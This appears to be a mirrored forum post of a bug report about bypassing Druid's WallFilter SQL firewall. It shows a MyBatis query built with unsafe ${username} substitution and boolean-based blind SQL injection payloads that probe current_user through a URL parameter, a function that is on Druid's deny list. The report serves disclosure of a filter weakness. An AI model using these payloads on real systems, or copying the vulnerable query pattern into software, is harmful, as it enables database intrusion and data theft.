druid Bypass WallFilter

kmb7vmvb  于 4个月前  发布在  Druid
关注(0)|答案(2)|浏览(54)

Mybatis UserMapping.xml

<select id="queryUserByName" resultMap="BaseResultMap" parameterType="String">
        SELECT id, username, password
        FROM users where username = "${username}"
    </select>

you can see http://test.com/queryUserByName?username=aaaa " or length(current_user) = "14
MySQL throwd Exception:nested exception is org.apache.ibatis.exceptions.TooManyResultsException
Its means the query is success but return too many result

then,you can see queryUserByName?username=aaaa" or ascii(substr(current_user,1,1)) = "114

Key function “current_user" exists in file /META-INF/druid/wall/mysql/deny-function.txt
So I think this is a bug

fjaof16o

fjaof16o2#

I am a newcomer. I am interested in this issue. Please guide me.

相关问题